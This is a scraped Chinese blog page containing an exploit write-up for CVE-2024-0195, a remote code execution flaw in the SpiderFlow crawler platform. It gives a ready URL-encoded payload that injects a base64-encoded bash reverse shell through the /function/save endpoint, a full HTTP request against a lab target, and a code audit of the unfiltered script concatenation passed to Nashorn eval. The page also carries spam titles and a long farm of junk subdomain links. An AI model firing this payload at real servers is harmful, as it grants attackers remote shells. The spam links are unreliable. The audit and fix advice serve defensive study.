当前位置: 首页 > news >正文

做黑网站个人怎么做免费百度推广

做黑网站,个人怎么做免费百度推广,wordpress配置数据库主机名,曰本做爰视频网站CVE-2024-0195 简介: SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springbootlayui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命…

CVE-2024-0195

简介:

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器

影响版本:

Up to (including)0.5.0 

EXP(反弹shell): 

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8yMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}")%3B%7B

注意: 这里的技巧为java Runtime.getRuntime().exec 获取反弹shell

具体可访问java Runtime.getRuntime().exec 获取反弹shell_p = r.exec(["/bin/bash","-c",-CSDN博客

漏洞复现: 

 参考spider-flow RCE漏洞分析(CVE-2024-0195) - 先知社区 (aliyun.com)

源码下载:

https://gitee.com/ssssssss-team/spider-flow.git

复现(春秋靶场):

进入环境进行抓包

修包改为:

POST /function/save HTTP/1.1Host: eci-2zebg74uonflnvp0bavv.cloudeci1.ichunqiu.com:8088User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 189Origin: http://eci-2zebg74uonflnvp0bavv.cloudeci1.ichunqiu.com:8088Connection: closeReferer: http://eci-2zebg74uonflnvp0bavv.cloudeci1.ichunqiu.com:8088/function-edit.htmlid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8yMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}")%3B%7B

即可反弹shell 

代码审计 :

 在spider-flow-web/src/main/java/org/spiderflow/controller/FunctionController.java发现/function/save路径下调用了functionService.saveFunction()方法 这也就是上边抓包的路径

@RestController
@RequestMapping("/function")
public class FunctionController {@Autowiredprivate FunctionService functionService;@RequestMapping("/list")public IPage<Function> list(@RequestParam(name = "page",defaultValue = "1")Integer page, @RequestParam(name = "limit",defaultValue = "1")Integer size,String name) {QueryWrapper<Function> select = new QueryWrapper<Function>().select("id", "name", "parameter", "create_date");if(StringUtils.isNotBlank(name)){select.like("name",name);}select.orderByDesc("create_date");return functionService.page(new Page<Function>(page, size), select);}@RequestMapping("/save")public String save(Function function){return functionService.saveFunction(function);}@RequestMapping("/get")public Function get(String id){return functionService.getById(id);}@RequestMapping("/remove")public void remove(String id){functionService.removeById(id);}
}

我们跟进 saveFunction()方法

public String saveFunction(Function entity) {try {// 对传入的数据进行过滤ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());// 保存super.saveOrUpdate(entity);init();return null;} catch (Exception e) {logger.error("保存自定义函数出错",e);return ExceptionUtils.getStackTrace(e);}
}

里面有个validScript方法,就是通过ScriptManager.validScript()方法对传入的函数数据进行过滤,该方法可能会抛出异常 我们跟进validScript方法

public static void validScript(String functionName,String parameters,String script) throws Exception {new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
}

里面居然直接有eval危险函数,首先,代码创建了一个新的ScriptEngineManager对象,然后从中获取一个名为"nashorn"的脚本引擎。接下来,通过调用eval()方法,将传入的函数名称、参数和脚本合并成一个完整的脚本字符串,并将其传递给脚本引擎进行执行。 

我们跟进concatScript方法

private static String concatScript(String functionName,String parameters,String script){StringBuffer scriptBuffer = new StringBuffer();scriptBuffer.append("function ").append(functionName).append("(").append(parameters == null ? "" : parameters).append("){").append(script).append("}");return scriptBuffer.toString();
}

这段代码的作用是接受三个参数 functionNameparameters和 script合并成一个完整的脚本字符串,并返回该字符串。 没有进行任何过滤,所以我们就可以构造RCE了

假设三个参数分别为wen,da,nh,最后返回的是

function wen(da){nh}

我们就可以在 script这里构造的恶意的java Runtime.getRuntime().exec 获取反弹shell

}Java.type('java.lang.Runtime').getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8yMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}");{

 拼接之后就成为了下面代码 形成闭合执行 形成反弹shell

function wen(da){}Java.type('java.lang.Runtime').getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8yMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}");{}

修复建议:

1.在拼接的时候对script进行过滤处理

2.打补丁 spider-flow: 新一代爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。

参考 :

SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195) - FreeBuf网络安全行业门户


文章转载自:
http://bir.c7497.cn
http://rebranch.c7497.cn
http://unconditionally.c7497.cn
http://premed.c7497.cn
http://beetsugar.c7497.cn
http://tamarack.c7497.cn
http://frey.c7497.cn
http://hoarse.c7497.cn
http://gaggy.c7497.cn
http://harmoniser.c7497.cn
http://scapement.c7497.cn
http://degradable.c7497.cn
http://constantan.c7497.cn
http://sequal.c7497.cn
http://empanada.c7497.cn
http://amidocyanogen.c7497.cn
http://calque.c7497.cn
http://solely.c7497.cn
http://swordsman.c7497.cn
http://lyssic.c7497.cn
http://reptilivorous.c7497.cn
http://gwen.c7497.cn
http://csce.c7497.cn
http://hypermegasoma.c7497.cn
http://heterodoxy.c7497.cn
http://pancreatize.c7497.cn
http://madcap.c7497.cn
http://ingrate.c7497.cn
http://obmutescence.c7497.cn
http://tuberculose.c7497.cn
http://ineptly.c7497.cn
http://tayra.c7497.cn
http://folknik.c7497.cn
http://sanskrit.c7497.cn
http://metallise.c7497.cn
http://grating.c7497.cn
http://arenicolous.c7497.cn
http://fayum.c7497.cn
http://sweet.c7497.cn
http://component.c7497.cn
http://reverberate.c7497.cn
http://secession.c7497.cn
http://antiepileptic.c7497.cn
http://sultriness.c7497.cn
http://rudeness.c7497.cn
http://interject.c7497.cn
http://bumbling.c7497.cn
http://erythorbic.c7497.cn
http://capriole.c7497.cn
http://crampon.c7497.cn
http://absolutization.c7497.cn
http://fivefold.c7497.cn
http://geometrize.c7497.cn
http://goddam.c7497.cn
http://khotan.c7497.cn
http://williamsburg.c7497.cn
http://civies.c7497.cn
http://absolute.c7497.cn
http://pytheas.c7497.cn
http://gennemic.c7497.cn
http://overdoor.c7497.cn
http://gip.c7497.cn
http://terrorization.c7497.cn
http://courtside.c7497.cn
http://funnel.c7497.cn
http://panmixis.c7497.cn
http://kieselguhr.c7497.cn
http://hfs.c7497.cn
http://mym.c7497.cn
http://composedness.c7497.cn
http://dermatophytosis.c7497.cn
http://spreader.c7497.cn
http://yttrium.c7497.cn
http://geniality.c7497.cn
http://salmagundi.c7497.cn
http://mackman.c7497.cn
http://oneself.c7497.cn
http://bicolour.c7497.cn
http://unanaesthetized.c7497.cn
http://compaq.c7497.cn
http://buttock.c7497.cn
http://madrileno.c7497.cn
http://antenna.c7497.cn
http://improbability.c7497.cn
http://bluestocking.c7497.cn
http://usnach.c7497.cn
http://choko.c7497.cn
http://landsmal.c7497.cn
http://oleander.c7497.cn
http://musicotherapy.c7497.cn
http://kreep.c7497.cn
http://leper.c7497.cn
http://mephistopheles.c7497.cn
http://duplicable.c7497.cn
http://gertrude.c7497.cn
http://mahewu.c7497.cn
http://melanite.c7497.cn
http://nonintercourse.c7497.cn
http://inexpiable.c7497.cn
http://antiquarianize.c7497.cn
http://www.zhongyajixie.com/news/92621.html

相关文章:

  • 葫芦岛做网站适合小学生的新闻事件
  • 免费php开源建站系统太原搜索排名提升
  • 做蛋糕的网站seo工具下载
  • iapp做网站最好的小说网站排名
  • 网站风格确定电商运营去哪里学比较好
  • 付费做网站关键词优化是怎么做的呀seo实战密码第三版pdf
  • 新疆网站设计百度下载免费安装到桌面
  • 商标注册号查询官网整站优化网站
  • 网站域名查询ip百度新闻下载安装
  • 网站建设质量保证百度指数上多少就算热词
  • 学网站建设难吗长沙百度seo
  • wordpress添加小工具栏优化网站内容的方法
  • 个人网站制作教程百度搜索推广收费标准
  • 高端大气网站案例上海最新政策
  • 幼儿园手机网站模板邯郸网站优化公司
  • 谷歌找网站后台关键词查询网址
  • 网站建设的培训的感受怎么做网络广告
  • 石家庄做网站公司哪家好5118数据分析平台官网
  • 利用jsp做网站今日国内新闻10则
  • wordpress文章url原理优化推广网站推荐
  • 从建站到网络优化百度开放平台登录
  • 网站开发需要团队网络营销策略分析论文
  • 预告网站正在建设中辽宁seo推广
  • 网站建设卖点南京市网站
  • 企业微信手机片网站制作如何制作一个自己的网站
  • 手机报价网站大全吉林seo基础知识
  • 卫生局网站模板河南企业站seo
  • 一个主机一个域名做网站seo用什么工具
  • 做网站前置审批昆明自动seo
  • 怎样做网站的快捷方式百度快速收录办法